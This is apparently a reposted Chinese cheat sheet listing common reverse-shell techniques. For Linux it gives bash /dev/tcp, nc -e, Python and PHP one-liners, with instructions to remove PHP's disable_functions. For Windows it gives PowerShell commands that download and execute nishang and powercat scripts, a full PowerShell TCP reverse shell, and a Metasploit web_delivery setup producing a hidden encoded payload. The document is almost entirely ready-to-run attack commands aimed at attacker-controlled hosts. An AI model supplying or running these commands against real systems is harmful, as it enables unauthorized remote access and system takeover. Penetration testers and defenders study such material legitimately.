几种常见的反弹shell方式

Linux中的常见反弹shell

方法一：利用Linux命令#

Copy
#靶机反弹命令
bash -i >/dev/tcp/x.x.x.x/23333 0>&1 2>&1
#攻击机开始监听
nc -lvp 23333

在系统文件中是不存在/dev/tcp这个文件的，它是一个特殊文件，打开这个文件就类似于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理/dev/udp就是通过udp来进行传输。

方法二：利用nc命令#

Copy
nc -e /bin/bash x.x.x.x 23333

方法三：利用脚本#

1、python#

Copy
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

2、php#

前提：需要在php.ini中放开危险函数system,exec。可以通过php --ini来查询php配置文件路径，然后删除配置文件中“disable_funtions”变量中对应的函数名即可。

Copy
#（1）反弹命令(代码假设TCP连接的文件描述符为4，如果不行可以换成5或6)
php -r '$sock=fsockopen("x.x.x.x",23333);system("/bin/bash -i <&4 >&4 2>&4");'
#（2）反弹命令
php -r 'exec("/bin/bash -i >& /dev/tcp/x.x.x.x/23333");'

Windows系统常见反弹命令

方法一：利用”nishang”攻击框架#

Nishang是一个基于PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

Copy
#（1）用UDP反弹命令：
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress x.x.x.x -port 23333
#kali进行监听
nc -lup 23333
#（2）利用TCP反弹命令：
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -port 23333
#kali进行监听
nc -lvp 23333

方法二：利用powercat#

powercat 为Powershell版的Netcat，实际上是一个powershell的函数，使用方法类似Netcat。

Copy
powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c x.x.x.x -p 23333 -e cmd

方法三：自定义powershell函数#

Copy
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('x.x.x.x',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

方法四：利用metasploit#

利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell。

Copy
#以powershell进行反弹为例，kali执行命令，可以看到生成已经过编码的payload：

msfconsole

use exploit/multi/script/web_delivery

set payload windows/meterpreter/reverse_tcp

set target 2

set LPORT 23333

set LHOST 192.168.178.131

set srvhost 0.0.0.0

set srvpost 8080

run

#Windows 执行生成的命令"powershell.exe -nop -w hidden -e ......"（-w hidden参数使命令运行时窗口隐藏）。

#kali接收到反弹

以上提到的是常见的反弹shell方式，当然，还存在更多的其他方式，github上也有很多成熟的攻击框架可以实现反弹shell,例如PowerSploit、Empire、Dnscat等等，感兴趣可以继续进行深入学习。

搬运自聚铭网络百家号